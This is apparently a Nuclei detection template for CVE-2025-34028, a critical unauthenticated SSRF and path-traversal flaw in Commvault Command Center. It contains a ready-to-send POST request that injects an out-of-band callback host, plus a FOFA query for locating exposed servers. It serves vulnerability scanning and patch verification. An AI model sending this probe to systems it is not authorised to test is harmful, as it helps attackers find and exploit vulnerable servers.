id: CVE-2025-34028 info: name: Commvault - SSRF via /commandcenter/deployWebpackage.do author: DhiyaneshDk,abhishekrautela severity: critical description: | A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38. impact: | Unauthenticated attackers can exploit SSRF through ZIP file uploads containing path traversal sequences, potentially leading to remote code execution on the Commvault server. remediation: | Apply the security patch as described in Commvault's security advisory for Command Center Innovation Release 11.38. reference: - https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html - https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/ - https://nvd.nist.gov/vuln/detail/CVE-2025-34028 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H cvss-score: 10 cve-id: CVE-2025-34028 cwe-id: CWE-22 epss-score: 0.69328 epss-percentile: 0.98665 metadata: verified: true max-request: 1 fofa-query: icon_hash="1209838013" tags: cve,cve2025,ssrf,oast,commvault,kev,vkev,vuln variables: string: "{{to_lower(rand_base(5))}}" http: - raw: - | POST /commandcenter/deployWebpackage.do HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded commcellName={{interactsh-url}}&servicePack={{string}}&version=x matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")' - 'status_code == 900' condition: and # digest: 4a0a00473045022100ce5b67e344fd9d1fd2e326110a92b847b3eb551a114f775bcf54f5decb4e60d1022074aaaa0494ab3da0bec97c35cbc6fbcf52b4d90af928bf8c7068a0988e0c2ad0:922c64590222798bb761d5b6d8e72950